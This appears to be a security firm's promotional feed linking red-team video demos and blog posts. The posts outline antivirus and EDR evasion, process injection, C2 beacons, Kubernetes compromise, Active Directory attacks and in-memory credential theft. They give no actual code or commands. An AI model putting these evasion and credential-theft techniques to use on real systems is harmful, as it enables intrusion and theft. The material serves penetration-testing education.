RBT Security

Check out our latest demo on how advanced implants evade Windows Defender protections using memory encryption, API obfuscation, and hybrid C2 redirectors.

https://www.youtube.com/watch?v=8y7L1gCtk-M

RBT Security 3 likes. "Windows Defender Evasion: Implant Analysis & Full Bypass | Havoc C2"

How hackers hide their commands.

New research reveals how "Command-Line Obfuscation" allows attackers to disguise their actions using secret symbols and "weird" characters to trick scanners.

1.- Hidden Intent: Masking malicious activity.
2.- Trusted Tools: Turning standard Windows programs into invisible weapons.
3.- Bypassing Alerts: Executing attacks without triggering security systems.

Learn more: https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation

Bypassing Detections with Command-Line Obfuscation Defensive tools like AVs and EDRs rely on command-line arguments for detecting malicious activity. This post demonstrates how command-line obfuscation, a shell-independent technique that exploits executables’ parsing “flaws”, can bypass such detections. It also introduces ArgFuscator, a new to...

The "Invisible" Tool in Every Computer.

Did you know one of the most powerful hacking tools is already installed on almost every Windows PC? It’s called PowerShell. While it's used by admins for work, hackers love it because it’s "built-in" and can help them hide their tracks.

1.- Fileless Attacks: Running malicious code in memory so it doesn't leave files for scanners to find.
2.- Password Stealing: Pulling credentials directly from the system's memory.
3.- Silent Control: Taking over other computers on the same network using "legitimate" commands.

Learn more about how to stay safe: https://hetmehta.com/posts/powershell-for-hackers/

PowerShell for Hackers: Exploitation Essentials | hetmehta.com A red teamer’s guide to PowerShell for post-exploitation: enum, privesc, persistence, and C2

Is your Kubernetes cluster truly secure?

Our new demo reveals how a single misconfigured dashboard can give an attacker "God-mode" access to your entire infrastructure.

1.- Authentication Bypass: Gaining entry without a password.
2.- C2 Integration: Deploying malicious pods that call back to a Sliver C2 framework for persistent control.
3.- Remote Control: Managing the cluster from anywhere using stolen tokens.

Operational convenience should never come at the cost of infrastructure hardening.

See the full attack: https://www.youtube.com/watch?v=Ha2uDx4fhj8

Kubernetes pentest part 6: Dashboard Exploitation From Misconfiguration to Full Cluster Compromise In this demonstration, we walk through a real-world Kubernetes attack chain targeting one of the most commonly misconfigured components in a cluster the Kube...

New demo from RBT Security!

We’re breaking down how to evade Microsoft Defender, AMSI, and ETW using MapView Code Injection. By mapping shared memory views instead of using traditional memory writes, we can deploy a Sliver C2 beacon with significantly less noise.

Check out the full workflow, including Native API resolution and post-ex enumeration using Sliver's fork-and-run with PPID spoofing, plus self-process injection to trigger built-in AMSI and ETW evasion.

Watch here: https://www.youtube.com/watch?v=Oq4GN9pHhUE

MapView Sections & Views Code Injection ⚠️ CORRECTION: At timestamp 18:52, the Process ID shown is 1688; this is incorrect. The correct PID is 4568. Using 1688 will spawn a new unintended process r...

How hackers bypass internal security.

These attacks are still valid and used daily by threat actors:

1.- IPv6 Hijacking: Intercepting secrets.
2.- Delegation Abuse: Impersonating users via nxc.
3.- AS-REP Roasting: Stealing specific password types.
4.- ADCS Attacks: Weaponizing digital certificates.

Demo:

Initial Access In An Internal Pentest Part 3 In this video, we continue our internal pe*******on testing series by demonstrating advanced post-initial access techniques in a controlled lab environment. ...

How do hackers get around internal security? (Part 2)

We demonstrate real-world scenarios where an attacker turns a minor network mistake into total control of your servers.

Inside the Attack Chain:

1.- New "Admins": Attackers use the network to create their own "Admin" accounts and add themselves to protected groups.

2.- Empire & PowerShell: We show how Empire is used to send hidden commands that open a backdoor for the hacker.

3.- Encrypted Havoc Theft: We used the Havoc framework to execute Mimikatz in-memory using XOR encryption. By "scrambling" the tool's code, it stays invisible to traditional antivirus software while it steals your passwords.

The Fix: Deep telemetry monitoring. By recording every digital footprint from new user accounts to hidden script commands, companies can stop the attack before the damage is done.

Demo: https://www.youtube.com/watch?v=Cx8dbqbwwu4

Initial Access In An Internal Pentest Part 2 In this video, we continue our initial access internal pe*******on testing series, focusing on post-initial-access techniques using C2 frameworks in a contro...

How do hackers get around internal security? (Part 1)

It's often not through complex "zero-day" exploits, but by using the network's own protocols against it.

An internal pe*******on test to show how three common attacks, NetNTLMv2 capture, NTLM Relay, and SMB Proxying, are used to gain control of a network from the inside out.

Understanding these paths is the first step to securing your organization!

Demo:

Initial Access for an Internal Pentest Landing that first foothold inside an internal network is often the most critical phase of an engagement. This playlist deconstructs the transition from "una...

Thread Context Code Injection – Video Demo

In this new RBT Security Labs video, we demonstrate how Thread Context Code Injection works and why it’s still used in real-world attacks.

Using a Havoc C2 payload, we show how attackers can hijack an existing thread within a legitimate process and move on to post-exploitation activities such as system enumeration.

🎥 Watch the demo here: https://youtu.be/H2TID1RyNew

Thread Context Code Injection - Havoc C2 In this video demonstration from RBT Security Labs, we break down Thread Context Code Injection, a classic process injection technique that hijacks an existi...

NEW VIDEO: Evading Microsoft Defender with APC Injection

Ever wonder how attackers hide malicious code inside legitimate programs while bypassing antivirus?

In our latest video, we demonstrate APC Injection via Suspended Thread, a stealthy technique that executes Adaptix C2 payloads inside trusted processes without triggering Microsoft Defender.

We show the complete attack chain:
1.- Payload injection into a legitimate process
2.- System reconnaissance with Seatbelt
3.- Credential extraction for lateral movement

👉 Watch the full demo on YouTube https://www.youtube.com/watch?v=CA9fohxfnkw
💬 Join our Discord community for more red team content
Perfect for cybersecurity professionals and anyone interested in offensive security!
https://discord.com/invite/8EfKbmgC

Evading Microsoft Defender: APC Injection Suspended Threads & Credential Extraction Join the Discord community to discuss and learn more: https://discord.com/invite/8EfKbmgCAPC Injection via Suspended ThreadIn this video, we demonstrate how ...